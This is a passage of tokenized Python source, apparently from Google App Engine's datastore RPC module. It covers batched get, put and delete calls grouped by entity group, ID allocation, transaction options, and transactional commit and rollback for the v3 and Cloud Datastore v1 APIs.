<EOL> return Configuration . max_entity_groups_per_rpc ( <EOL> config , self . __config ) or self . DEFAULT_MAX_ENTITY_GROUPS_PER_RPC <EOL> def _extract_entity_group ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if _CLOUD_DATASTORE_ENABLED and isinstance ( value , googledatastore . Entity ) : <EOL> value = value . key <EOL> if isinstance ( value , entity_pb . EntityProto ) : <EOL> value = value . key ( ) <EOL> if _CLOUD_DATASTORE_ENABLED and isinstance ( value , googledatastore . Key ) : <EOL> elem = value . path [ <NUM_LIT:0> ] <EOL> elem_id = elem . id <EOL> elem_name = elem . name <EOL> kind = elem . kind <EOL> else : <EOL> elem = value . path ( ) . element ( <NUM_LIT:0> ) <EOL> kind = elem . type ( ) <EOL> elem_id = elem . id ( ) <EOL> elem_name = elem . name ( ) <EOL> return ( kind , elem_id or elem_name or ( '<STR_LIT>' , id ( elem ) ) ) <EOL> def _map_and_group ( self , values , map_fn , group_fn ) : <EOL> """<STR_LIT>""" <EOL> indexed_key_groups = collections . defaultdict ( list ) <EOL> for index , value in enumerate ( values ) : <EOL> key = map_fn ( value ) <EOL> indexed_key_groups [ group_fn ( key ) ] . append ( ( key , index ) ) <EOL> return indexed_key_groups . values ( ) <EOL> def __create_result_index_pairs ( self , indexes ) : <EOL> """<STR_LIT>""" <EOL> def create_result_index_pairs ( results ) : <EOL> return zip ( results , indexes ) <EOL> return create_result_index_pairs <EOL> def __sort_result_index_pairs ( self , extra_hook ) : <EOL> """<STR_LIT>""" <EOL> def sort_result_index_pairs ( result_index_pairs ) : <EOL> results = [ None ] * len ( result_index_pairs ) <EOL> for result , index in result_index_pairs : <EOL> results [ index ] = result <EOL> if extra_hook is not None : <EOL> results = extra_hook ( results ) <EOL> return results <EOL> return sort_result_index_pairs <EOL> def _generate_pb_lists ( self , grouped_values , base_size , max_count , <EOL> max_groups , config ) : <EOL> """<STR_LIT>""" <EOL> max_size = ( Configuration . max_rpc_bytes ( config , self . __config ) or <EOL> self . MAX_RPC_BYTES ) <EOL> pbs = [ ] <EOL> pb_indexes = [ ] <EOL> size = base_size <EOL> num_groups = <NUM_LIT:0> <EOL> for indexed_pbs in grouped_values : <EOL> num_groups += <NUM_LIT:1> <EOL> if max_groups is not None and num_groups > max_groups : <EOL> yield ( pbs , pb_indexes ) <EOL> pbs = [ ] <EOL> pb_indexes = [ ] <EOL> size = base_size <EOL> num_groups = <NUM_LIT:1> <EOL> for indexed_pb in indexed_pbs : <EOL> ( pb , index ) = indexed_pb <EOL> incr_size = pb . ByteSize ( ) + <NUM_LIT:5> <EOL> if ( not isinstance ( config , apiproxy_stub_map . UserRPC ) and <EOL> ( len ( pbs ) >= max_count or ( pbs and size + incr_size > max_size ) ) ) : <EOL> yield ( pbs , pb_indexes ) <EOL> pbs = [ ] <EOL> pb_indexes = [ ] <EOL> size = base_size <EOL> num_groups = <NUM_LIT:1> <EOL> pbs . append ( pb ) <EOL> pb_indexes . append ( index ) <EOL> size += incr_size <EOL> yield ( pbs , pb_indexes ) <EOL> def __force ( self , req ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( req , ( datastore_pb . PutRequest , <EOL> datastore_pb . TouchRequest , <EOL> datastore_pb . DeleteRequest ) ) : <EOL> req . set_force ( True ) <EOL> def get ( self , keys ) : <EOL> """<STR_LIT>""" <EOL> return self . async_get ( None , keys ) . get_result ( ) <EOL> def async_get ( self , config , keys , extra_hook = None ) : <EOL> """<STR_LIT>""" <EOL> def make_get_call ( base_req , pbs , extra_hook = None ) : <EOL> req = copy . deepcopy ( base_req ) <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> method = '<STR_LIT>' <EOL> req . keys . extend ( pbs ) <EOL> resp = googledatastore . LookupResponse ( ) <EOL> else : <EOL> method = '<STR_LIT>' <EOL> req . key_list ( ) . extend ( pbs ) <EOL> resp = datastore_pb . GetResponse ( ) <EOL> user_data = config , pbs , extra_hook <EOL> return self . _make_rpc_call ( config , method , req , resp , <EOL> get_result_hook = self . __get_hook , <EOL> user_data = user_data , <EOL> service_name = self . _api_version ) <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> base_req = googledatastore . LookupRequest ( ) <EOL> key_to_pb = self . __adapter . key_to_pb_v1 <EOL> else : <EOL> base_req = datastore_pb . GetRequest ( ) <EOL> base_req . set_allow_deferred ( True ) <EOL> key_to_pb = self . __adapter . key_to_pb <EOL> is_read_current = self . _set_request_read_policy ( base_req , config ) <EOL> txn = self . _set_request_transaction ( base_req ) <EOL> if isinstance ( config , apiproxy_stub_map . UserRPC ) or len ( keys ) <= <NUM_LIT:1> : <EOL> pbs = [ key_to_pb ( key ) for key in keys ] <EOL> return make_get_call ( base_req , pbs , extra_hook ) <EOL> max_count = ( Configuration . max_get_keys ( config , self . __config ) or <EOL> self . MAX_GET_KEYS ) <EOL> indexed_keys_by_entity_group = self . _map_and_group ( <EOL> keys , key_to_pb , self . _extract_entity_group ) <EOL> if is_read_current is None : <EOL> is_read_current = ( self . get_datastore_type ( ) == <EOL> BaseConnection . HIGH_REPLICATION_DATASTORE ) <EOL> if is_read_current and txn is None : <EOL> max_egs_per_rpc = self . __get_max_entity_groups_per_rpc ( config ) <EOL> else : <EOL> max_egs_per_rpc = None <EOL> pbsgen = self . _generate_pb_lists ( indexed_keys_by_entity_group , <EOL> base_req . ByteSize ( ) , max_count , <EOL> max_egs_per_rpc , config ) <EOL> rpcs = [ ] <EOL> for pbs , indexes in pbsgen : <EOL> rpcs . append ( make_get_call ( base_req , pbs , <EOL> self . __create_result_index_pairs ( indexes ) ) ) <EOL> return MultiRpc ( rpcs , self . __sort_result_index_pairs ( extra_hook ) ) <EOL> def __get_hook ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> self . check_rpc_success ( rpc ) <EOL> config , keys_from_request , extra_hook = rpc . user_data <EOL> if self . _api_version == _DATASTORE_V3 and rpc . response . in_order ( ) : <EOL> entities = [ ] <EOL> for entity_result in rpc . response . entity_list ( ) : <EOL> if entity_result . has_entity ( ) : <EOL> entity = self . __adapter . pb_to_entity ( entity_result . entity ( ) ) <EOL> else : <EOL> entity = None <EOL> entities . append ( entity ) <EOL> else : <EOL> current_get_response = rpc . response <EOL> result_dict = { } <EOL> self . __add_get_response_entities_to_dict ( current_get_response , <EOL> result_dict ) <EOL> deferred_req = copy . deepcopy ( rpc . request ) <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> method = '<STR_LIT>' <EOL> deferred_resp = googledatastore . LookupResponse ( ) <EOL> while current_get_response . deferred : <EOL> deferred_req . ClearField ( '<STR_LIT>' ) <EOL> deferred_req . keys . extend ( current_get_response . deferred ) <EOL> deferred_resp . Clear ( ) <EOL> deferred_rpc = self . _make_rpc_call ( config , method , <EOL> deferred_req , deferred_resp , <EOL> service_name = self . _api_version ) <EOL> deferred_rpc . get_result ( ) <EOL> current_get_response = deferred_rpc . response <EOL> self . __add_get_response_entities_to_dict ( current_get_response , <EOL> result_dict ) <EOL> else : <EOL> method = '<STR_LIT>' <EOL> deferred_resp = datastore_pb . GetResponse ( ) <EOL> while current_get_response . deferred_list ( ) : <EOL> deferred_req . clear_key ( ) <EOL> deferred_req . key_list ( ) . extend ( current_get_response . deferred_list ( ) ) <EOL> deferred_resp . Clear ( ) <EOL> deferred_rpc = self . _make_rpc_call ( config , method , <EOL> deferred_req , deferred_resp , <EOL> service_name = self . _api_version ) <EOL> deferred_rpc . get_result ( ) <EOL> current_get_response = deferred_rpc . response <EOL> self . __add_get_response_entities_to_dict ( current_get_response , <EOL> result_dict ) <EOL> entities = [ result_dict . get ( datastore_types . ReferenceToKeyValue ( pb ) ) <EOL> for pb in keys_from_request ] <EOL> if extra_hook is not None : <EOL> entities = extra_hook ( entities ) <EOL> return entities <EOL> def __add_get_response_entities_to_dict ( self , get_response , result_dict ) : <EOL> """<STR_LIT>""" <EOL> if ( _CLOUD_DATASTORE_ENABLED <EOL> and isinstance ( get_response , googledatastore . LookupResponse ) ) : <EOL> for result in get_response . found : <EOL> v1_key = result . entity . key <EOL> entity = self . __adapter . pb_v1_to_entity ( result . entity , False ) <EOL> result_dict [ datastore_types . ReferenceToKeyValue ( v1_key ) ] = entity <EOL> else : <EOL> for entity_result in get_response . entity_list ( ) : <EOL> if entity_result . has_entity ( ) : <EOL> reference_pb = entity_result . entity ( ) . key ( ) <EOL> hashable_key = datastore_types . ReferenceToKeyValue ( reference_pb ) <EOL> entity = self . __adapter . pb_to_entity ( entity_result . entity ( ) ) <EOL> result_dict [ hashable_key ] = entity <EOL> def get_indexes ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . async_get_indexes ( None ) . get_result ( ) <EOL> def async_get_indexes ( self , config , extra_hook = None , _app = None ) : <EOL> """<STR_LIT>""" <EOL> req = datastore_pb . GetIndicesRequest ( ) <EOL> req . set_app_id ( datastore_types . ResolveAppId ( _app ) ) <EOL> resp = datastore_pb . CompositeIndices ( ) <EOL> return self . _make_rpc_call ( config , '<STR_LIT>' , req , resp , <EOL> get_result_hook = self . __get_indexes_hook , <EOL> user_data = extra_hook , <EOL> service_name = _DATASTORE_V3 ) <EOL> def __get_indexes_hook ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> self . check_rpc_success ( rpc ) <EOL> indexes = [ self . __adapter . pb_to_index ( index ) <EOL> for index in rpc . response . index_list ( ) ] <EOL> if rpc . user_data : <EOL> indexes = rpc . user_data ( indexes ) <EOL> return indexes <EOL> def put ( self , entities ) : <EOL> """<STR_LIT>""" <EOL> return self . async_put ( None , entities ) . get_result ( ) <EOL> def async_put ( self , config , entities , extra_hook = None ) : <EOL> """<STR_LIT>""" <EOL> def make_put_call ( base_req , pbs , user_data = None ) : <EOL> req = copy . deepcopy ( base_req ) <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> for entity in pbs : <EOL> mutation = req . mutations . add ( ) <EOL> mutation . upsert . CopyFrom ( entity ) <EOL> method = '<STR_LIT>' <EOL> resp = googledatastore . CommitResponse ( ) <EOL> else : <EOL> req . entity_list ( ) . extend ( pbs ) <EOL> method = '<STR_LIT>' <EOL> resp = datastore_pb . PutResponse ( ) <EOL> user_data = pbs , user_data <EOL> return self . _make_rpc_call ( config , method , req , resp , <EOL> get_result_hook = self . __put_hook , <EOL> user_data = user_data , <EOL> service_name = self . _api_version ) <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> base_req = googledatastore . CommitRequest ( ) <EOL> base_req . mode = googledatastore . CommitRequest . NON_TRANSACTIONAL <EOL> entity_to_pb = self . __adapter . entity_to_pb_v1 <EOL> else : <EOL> base_req = datastore_pb . PutRequest ( ) <EOL> entity_to_pb = self . __adapter . entity_to_pb <EOL> self . _set_request_transaction ( base_req ) <EOL> if Configuration . force_writes ( config , self . __config ) : <EOL> self . __force ( base_req ) <EOL> if isinstance ( config , apiproxy_stub_map . UserRPC ) or len ( entities ) <= <NUM_LIT:1> : <EOL> pbs = [ entity_to_pb ( entity ) for entity in entities ] <EOL> return make_put_call ( base_req , pbs , extra_hook ) <EOL> max_count = ( Configuration . max_put_entities ( config , self . __config ) or <EOL> self . MAX_PUT_ENTITIES ) <EOL> if ( ( self . _api_version == _CLOUD_DATASTORE_V1 and <EOL> not base_req . transaction ) or <EOL> not base_req . has_transaction ( ) ) : <EOL> max_egs_per_rpc = self . __get_max_entity_groups_per_rpc ( config ) <EOL> else : <EOL> max_egs_per_rpc = None <EOL> indexed_entities_by_entity_group = self . _map_and_group ( <EOL> entities , entity_to_pb , self . _extract_entity_group ) <EOL> pbsgen = self . _generate_pb_lists ( indexed_entities_by_entity_group , <EOL> base_req . ByteSize ( ) , max_count , <EOL> max_egs_per_rpc , config ) <EOL> rpcs = [ ] <EOL> for pbs , indexes in pbsgen : <EOL> rpcs . append ( make_put_call ( base_req , pbs , <EOL> self . __create_result_index_pairs ( indexes ) ) ) <EOL> return MultiRpc ( rpcs , self . __sort_result_index_pairs ( extra_hook ) ) <EOL> def __put_hook ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> self . check_rpc_success ( rpc ) <EOL> entities_from_request , extra_hook = rpc . user_data <EOL> if ( _CLOUD_DATASTORE_ENABLED <EOL> and isinstance ( rpc . response , googledatastore . CommitResponse ) ) : <EOL> keys = [ ] <EOL> i = <NUM_LIT:0> <EOL> for entity in entities_from_request : <EOL> if datastore_pbs . is_complete_v1_key ( entity . key ) : <EOL> keys . append ( entity . key ) <EOL> else : <EOL> keys . append ( rpc . response . mutation_results [ i ] . key ) <EOL> i += <NUM_LIT:1> <EOL> keys = [ self . __adapter . pb_v1_to_key ( key ) for key in keys ] <EOL> else : <EOL> keys = [ self . __adapter . pb_to_key ( key ) for key in rpc . response . key_list ( ) ] <EOL> if extra_hook is not None : <EOL> keys = extra_hook ( keys ) <EOL> return keys <EOL> def delete ( self , keys ) : <EOL> """<STR_LIT>""" <EOL> return self . async_delete ( None , keys ) . get_result ( ) <EOL> def async_delete ( self , config , keys , extra_hook = None ) : <EOL> """<STR_LIT>""" <EOL> def make_delete_call ( base_req , pbs , user_data = None ) : <EOL> req = copy . deepcopy ( base_req ) <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> for pb in pbs : <EOL> mutation = req . mutations . add ( ) <EOL> mutation . delete . CopyFrom ( pb ) <EOL> method = '<STR_LIT>' <EOL> resp = googledatastore . CommitResponse ( ) <EOL> else : <EOL> req . key_list ( ) . extend ( pbs ) <EOL> method = '<STR_LIT>' <EOL> resp = datastore_pb . DeleteResponse ( ) <EOL> return self . _make_rpc_call ( config , method , req , resp , <EOL> get_result_hook = self . __delete_hook , <EOL> user_data = user_data , <EOL> service_name = self . _api_version ) <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> base_req = googledatastore . CommitRequest ( ) <EOL> base_req . mode = googledatastore . CommitRequest . NON_TRANSACTIONAL <EOL> key_to_pb = self . __adapter . key_to_pb_v1 <EOL> else : <EOL> base_req = datastore_pb . DeleteRequest ( ) <EOL> key_to_pb = self . __adapter . key_to_pb <EOL> self . _set_request_transaction ( base_req ) <EOL> if Configuration . force_writes ( config , self . __config ) : <EOL> self . __force ( base_req ) <EOL> if isinstance ( config , apiproxy_stub_map . UserRPC ) or len ( keys ) <= <NUM_LIT:1> : <EOL> pbs = [ key_to_pb ( key ) for key in keys ] <EOL> return make_delete_call ( base_req , pbs , extra_hook ) <EOL> max_count = ( Configuration . max_delete_keys ( config , self . __config ) or <EOL> self . MAX_DELETE_KEYS ) <EOL> if ( ( self . _api_version == _CLOUD_DATASTORE_V1 and <EOL> not base_req . transaction ) or <EOL> not base_req . has_transaction ( ) ) : <EOL> max_egs_per_rpc = self . __get_max_entity_groups_per_rpc ( config ) <EOL> else : <EOL> max_egs_per_rpc = None <EOL> indexed_keys_by_entity_group = self . _map_and_group ( <EOL> keys , key_to_pb , self . _extract_entity_group ) <EOL> pbsgen = self . _generate_pb_lists ( indexed_keys_by_entity_group , <EOL> base_req . ByteSize ( ) , max_count , <EOL> max_egs_per_rpc , config ) <EOL> rpcs = [ ] <EOL> for pbs , _ in pbsgen : <EOL> rpcs . append ( make_delete_call ( base_req , pbs ) ) <EOL> return MultiRpc ( rpcs , extra_hook ) <EOL> def __delete_hook ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> self . check_rpc_success ( rpc ) <EOL> if rpc . user_data is not None : <EOL> rpc . user_data ( None ) <EOL> def begin_transaction ( self , app ) : <EOL> """<STR_LIT>""" <EOL> return self . async_begin_transaction ( None , app ) . get_result ( ) <EOL> def async_begin_transaction ( self , config , app ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( app , basestring ) or not app : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( app , ) ) <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> req = googledatastore . BeginTransactionRequest ( ) <EOL> resp = googledatastore . BeginTransactionResponse ( ) <EOL> else : <EOL> req = datastore_pb . BeginTransactionRequest ( ) <EOL> req . set_app ( app ) <EOL> if ( TransactionOptions . xg ( config , self . __config ) ) : <EOL> req . set_allow_multiple_eg ( True ) <EOL> resp = datastore_pb . Transaction ( ) <EOL> return self . _make_rpc_call ( config , '<STR_LIT>' , req , resp , <EOL> get_result_hook = self . __begin_transaction_hook , <EOL> service_name = self . _api_version ) <EOL> def __begin_transaction_hook ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> self . check_rpc_success ( rpc ) <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> return rpc . response . transaction <EOL> else : <EOL> return rpc . response <EOL> class Connection ( BaseConnection ) : <EOL> """<STR_LIT>""" <EOL> @ _positional ( <NUM_LIT:1> ) <EOL> def __init__ ( self , adapter = None , config = None , _api_version = _DATASTORE_V3 ) : <EOL> """<STR_LIT>""" <EOL> super ( Connection , self ) . __init__ ( adapter = adapter , config = config , <EOL> _api_version = _api_version ) <EOL> self . __adapter = self . adapter <EOL> self . __config = self . config <EOL> def new_transaction ( self , config = None ) : <EOL> """<STR_LIT>""" <EOL> config = self . __config . merge ( config ) <EOL> return TransactionalConnection ( adapter = self . __adapter , config = config , <EOL> _api_version = self . _api_version ) <EOL> def allocate_ids ( self , key , size = None , max = None ) : <EOL> """<STR_LIT>""" <EOL> return self . async_allocate_ids ( None , key , size , max ) . get_result ( ) <EOL> def async_allocate_ids ( self , config , key , size = None , max = None , <EOL> extra_hook = None ) : <EOL> """<STR_LIT>""" <EOL> if size is not None : <EOL> if max is not None : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' ) <EOL> if not isinstance ( size , ( int , long ) ) : <EOL> raise datastore_errors . BadArgumentError ( '<STR_LIT>' % ( size , ) ) <EOL> if size > _MAX_ID_BATCH_SIZE : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' <EOL> % ( _MAX_ID_BATCH_SIZE , size ) ) <EOL> if size <= <NUM_LIT:0> : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % size ) <EOL> if max is not None : <EOL> if not isinstance ( max , ( int , long ) ) : <EOL> raise datastore_errors . BadArgumentError ( '<STR_LIT>' % ( max , ) ) <EOL> if max < <NUM_LIT:0> : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % <EOL> size ) <EOL> req = datastore_pb . AllocateIdsRequest ( ) <EOL> req . mutable_model_key ( ) . CopyFrom ( self . __adapter . key_to_pb ( key ) ) <EOL> if size is not None : <EOL> req . set_size ( size ) <EOL> if max is not None : <EOL> req . set_max ( max ) <EOL> resp = datastore_pb . AllocateIdsResponse ( ) <EOL> rpc = self . _make_rpc_call ( config , '<STR_LIT>' , req , resp , <EOL> get_result_hook = self . __allocate_ids_hook , <EOL> user_data = extra_hook , <EOL> service_name = _DATASTORE_V3 ) <EOL> return rpc <EOL> def __allocate_ids_hook ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> self . check_rpc_success ( rpc ) <EOL> pair = rpc . response . start ( ) , rpc . response . end ( ) <EOL> if rpc . user_data is not None : <EOL> pair = rpc . user_data ( pair ) <EOL> return pair <EOL> def _reserve_keys ( self , keys ) : <EOL> """<STR_LIT>""" <EOL> self . _async_reserve_keys ( None , keys ) . get_result ( ) <EOL> def _async_reserve_keys ( self , config , keys , extra_hook = None ) : <EOL> """<STR_LIT>""" <EOL> def to_id_key ( key ) : <EOL> if key . path ( ) . element_size ( ) == <NUM_LIT:1> : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return self . _extract_entity_group ( key ) <EOL> keys_by_idkey = self . _map_and_group ( keys , self . __adapter . key_to_pb , <EOL> to_id_key ) <EOL> max_count = ( Configuration . max_allocate_ids_keys ( config , self . __config ) or <EOL> self . MAX_ALLOCATE_IDS_KEYS ) <EOL> rpcs = [ ] <EOL> pbsgen = self . _generate_pb_lists ( keys_by_idkey , <NUM_LIT:0> , max_count , None , config ) <EOL> for pbs , _ in pbsgen : <EOL> req = datastore_v4_pb . AllocateIdsRequest ( ) <EOL> for key in pbs : <EOL> datastore_pbs . get_entity_converter ( ) . v3_to_v4_key ( key , <EOL> req . add_reserve ( ) ) <EOL> resp = datastore_v4_pb . AllocateIdsResponse ( ) <EOL> rpcs . append ( self . _make_rpc_call ( config , '<STR_LIT>' , req , resp , <EOL> get_result_hook = self . __reserve_keys_hook , <EOL> user_data = extra_hook , <EOL> service_name = _DATASTORE_V4 ) ) <EOL> return MultiRpc ( rpcs ) <EOL> def __reserve_keys_hook ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> self . check_rpc_success ( rpc ) <EOL> if rpc . user_data is not None : <EOL> return rpc . user_data ( rpc . response ) <EOL> class TransactionOptions ( Configuration ) : <EOL> """<STR_LIT>""" <EOL> NESTED = <NUM_LIT:1> <EOL> """<STR_LIT>""" <EOL> MANDATORY = <NUM_LIT:2> <EOL> """<STR_LIT>""" <EOL> ALLOWED = <NUM_LIT:3> <EOL> """<STR_LIT>""" <EOL> INDEPENDENT = <NUM_LIT:4> <EOL> """<STR_LIT>""" <EOL> _PROPAGATION = frozenset ( ( NESTED , MANDATORY , ALLOWED , INDEPENDENT ) ) <EOL> @ ConfigOption <EOL> def propagation ( value ) : <EOL> """<STR_LIT>""" <EOL> if value not in TransactionOptions . _PROPAGATION : <EOL> raise datastore_errors . BadArgumentError ( '<STR_LIT>' % <EOL> ( value , ) ) <EOL> return value <EOL> @ ConfigOption <EOL> def xg ( value ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( value , bool ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( value , ) ) <EOL> return value <EOL> @ ConfigOption <EOL> def retries ( value ) : <EOL> """<STR_LIT>""" <EOL> datastore_types . ValidateInteger ( value , <EOL> '<STR_LIT>' , <EOL> datastore_errors . BadArgumentError , <EOL> zero_ok = True ) <EOL> return value <EOL> @ ConfigOption <EOL> def app ( value ) : <EOL> """<STR_LIT>""" <EOL> datastore_types . ValidateString ( value , <EOL> '<STR_LIT>' , <EOL> datastore_errors . BadArgumentError ) <EOL> return value <EOL> class TransactionalConnection ( BaseConnection ) : <EOL> """<STR_LIT>""" <EOL> @ _positional ( <NUM_LIT:1> ) <EOL> def __init__ ( self , <EOL> adapter = None , config = None , transaction = None , entity_group = None , <EOL> _api_version = _DATASTORE_V3 ) : <EOL> """<STR_LIT>""" <EOL> super ( TransactionalConnection , self ) . __init__ ( adapter = adapter , <EOL> config = config , <EOL> _api_version = _api_version ) <EOL> self . __adapter = self . adapter <EOL> self . __config = self . config <EOL> if transaction is None : <EOL> app = TransactionOptions . app ( self . config ) <EOL> app = datastore_types . ResolveAppId ( TransactionOptions . app ( self . config ) ) <EOL> self . __transaction_rpc = self . async_begin_transaction ( None , app ) <EOL> else : <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> txn_class = str <EOL> else : <EOL> txn_class = datastore_pb . Transaction <EOL> if not isinstance ( transaction , txn_class ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % transaction ) <EOL> self . __transaction = transaction <EOL> self . __transaction_rpc = None <EOL> self . __finished = False <EOL> self . __pending_v1_upserts = { } <EOL> self . __pending_v1_deletes = { } <EOL> @ property <EOL> def finished ( self ) : <EOL> return self . __finished <EOL> @ property <EOL> def transaction ( self ) : <EOL> if self . __transaction_rpc is not None : <EOL> self . __transaction = self . __transaction_rpc . get_result ( ) <EOL> self . __transaction_rpc = None <EOL> return self . __transaction <EOL> def _set_request_transaction ( self , request ) : <EOL> """<STR_LIT>""" <EOL> if self . __finished : <EOL> raise datastore_errors . BadRequestError ( <EOL> '<STR_LIT>' ) <EOL> transaction = self . transaction <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> if isinstance ( request , ( googledatastore . CommitRequest , <EOL> googledatastore . RollbackRequest ) ) : <EOL> request . transaction = transaction <EOL> elif isinstance ( request , ( googledatastore . LookupRequest , <EOL> googledatastore . RunQueryRequest ) ) : <EOL> request . read_options . transaction = transaction <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> type ( request ) ) <EOL> request . read_options . transaction = transaction <EOL> else : <EOL> request . mutable_transaction ( ) . CopyFrom ( transaction ) <EOL> return transaction <EOL> def _end_transaction ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . __finished : <EOL> raise datastore_errors . BadRequestError ( <EOL> '<STR_LIT>' ) <EOL> self . wait_for_all_pending_rpcs ( ) <EOL> assert not self . get_pending_rpcs ( ) <EOL> transaction = self . transaction <EOL> self . __finished = True <EOL> self . __transaction = None <EOL> return transaction <EOL> def async_put ( self , config , entities , extra_hook = None ) : <EOL> """<STR_LIT>""" <EOL> if self . _api_version != _CLOUD_DATASTORE_V1 : <EOL> return super ( TransactionalConnection , self ) . async_put ( <EOL> config , entities , extra_hook ) <EOL> v1_entities = [ self . adapter . entity_to_pb_v1 ( entity ) <EOL> for entity in entities ] <EOL> v1_req = googledatastore . AllocateIdsRequest ( ) <EOL> for v1_entity in v1_entities : <EOL> if not datastore_pbs . is_complete_v1_key ( v1_entity . key ) : <EOL> v1_req . keys . add ( ) . CopyFrom ( v1_entity . key ) <EOL> user_data = v1_entities , extra_hook <EOL> service_name = _CLOUD_DATASTORE_V1 <EOL> if not v1_req . keys : <EOL> service_name = _NOOP_SERVICE <EOL> return self . _make_rpc_call ( config , '<STR_LIT>' , v1_req , <EOL> googledatastore . AllocateIdsResponse ( ) , <EOL> get_result_hook = self . __v1_put_allocate_ids_hook , <EOL> user_data = user_data , <EOL> service_name = service_name ) <EOL> def __v1_put_allocate_ids_hook ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> self . check_rpc_success ( rpc ) <EOL> v1_resp = rpc . response <EOL> return self . __v1_build_put_result ( list ( v1_resp . keys ) , <EOL> rpc . user_data ) <EOL> def __v1_build_put_result ( self , v1_allocated_keys , user_data ) : <EOL> """<STR_LIT>""" <EOL> v1_entities , extra_hook = user_data <EOL> keys = [ ] <EOL> idx = <NUM_LIT:0> <EOL> for v1_entity in v1_entities : <EOL> v1_entity = copy . deepcopy ( v1_entity ) <EOL> if not datastore_pbs . is_complete_v1_key ( v1_entity . key ) : <EOL> v1_entity . key . CopyFrom ( v1_allocated_keys [ idx ] ) <EOL> idx += <NUM_LIT:1> <EOL> hashable_key = datastore_types . ReferenceToKeyValue ( v1_entity . key ) <EOL> self . __pending_v1_deletes . pop ( hashable_key , None ) <EOL> self . __pending_v1_upserts [ hashable_key ] = v1_entity <EOL> keys . append ( self . adapter . pb_v1_to_key ( copy . deepcopy ( v1_entity . key ) ) ) <EOL> if extra_hook : <EOL> keys = extra_hook ( keys ) <EOL> return keys <EOL> def async_delete ( self , config , keys , extra_hook = None ) : <EOL> """<STR_LIT>""" <EOL> if self . _api_version != _CLOUD_DATASTORE_V1 : <EOL> return super ( TransactionalConnection , self ) . async_delete ( config , <EOL> keys , <EOL> extra_hook ) <EOL> v1_keys = [ self . __adapter . key_to_pb_v1 ( key ) for key in keys ] <EOL> for key in v1_keys : <EOL> hashable_key = datastore_types . ReferenceToKeyValue ( key ) <EOL> self . __pending_v1_upserts . pop ( hashable_key , None ) <EOL> self . __pending_v1_deletes [ hashable_key ] = key <EOL> return self . _make_rpc_call ( config , '<STR_LIT>' , None , <EOL> googledatastore . CommitResponse ( ) , <EOL> get_result_hook = self . __v1_delete_hook , <EOL> user_data = extra_hook , <EOL> service_name = _NOOP_SERVICE ) <EOL> def __v1_delete_hook ( self , rpc ) : <EOL> extra_hook = rpc . user_data <EOL> if extra_hook : <EOL> extra_hook ( None ) <EOL> def commit ( self ) : <EOL> """<STR_LIT>""" <EOL> rpc = self . _create_rpc ( service_name = self . _api_version ) <EOL> rpc = self . async_commit ( rpc ) <EOL> if rpc is None : <EOL> return True <EOL> return rpc . get_result ( ) <EOL> def async_commit ( self , config ) : <EOL> """<STR_LIT>""" <EOL> transaction = self . _end_transaction ( ) <EOL> if transaction is None : <EOL> return None <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> req = googledatastore . CommitRequest ( ) <EOL> req . transaction = transaction <EOL> if Configuration . force_writes ( config , self . __config ) : <EOL> self . __force ( req ) <EOL> for entity in self . __pending_v1_upserts . itervalues ( ) : <EOL> mutation = req . mutations . add ( ) <EOL> mutation . upsert . CopyFrom ( entity ) <EOL> for key in self . __pending_v1_deletes . itervalues ( ) : <EOL> mutation = req . mutations . add ( ) <EOL> mutation . delete . CopyFrom ( key ) <EOL> self . __pending_v1_upserts . clear ( ) <EOL> self . __pending_v1_deletes . clear ( ) <EOL> resp = googledatastore . CommitResponse ( ) <EOL> else : <EOL> req = transaction <EOL> resp = datastore_pb . CommitResponse ( ) <EOL> return self . _make_rpc_call ( config , '<STR_LIT>' , req , resp , <EOL> get_result_hook = self . __commit_hook , <EOL> service_name = self . _api_version ) <EOL> def __commit_hook ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> rpc . check_success ( ) <EOL> except apiproxy_errors . ApplicationError , err : <EOL> if err . application_error == datastore_pb . Error . CONCURRENT_TRANSACTION : <EOL> return False <EOL> else : <EOL> raise _ToDatastoreError ( err ) <EOL> else : <EOL> return True <EOL> def rollback ( self ) : <EOL> """<STR_LIT>""" <EOL> rpc = self . async_rollback ( None ) <EOL> if rpc is None : <EOL> return None <EOL> return rpc . get_result ( ) <EOL> def async_rollback ( self , config ) : <EOL> """<STR_LIT>""" <EOL> transaction = self . _end_transaction ( ) <EOL> if transaction is None : <EOL> return None <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> req = googledatastore . RollbackRequest ( ) <EOL> req . transaction = transaction 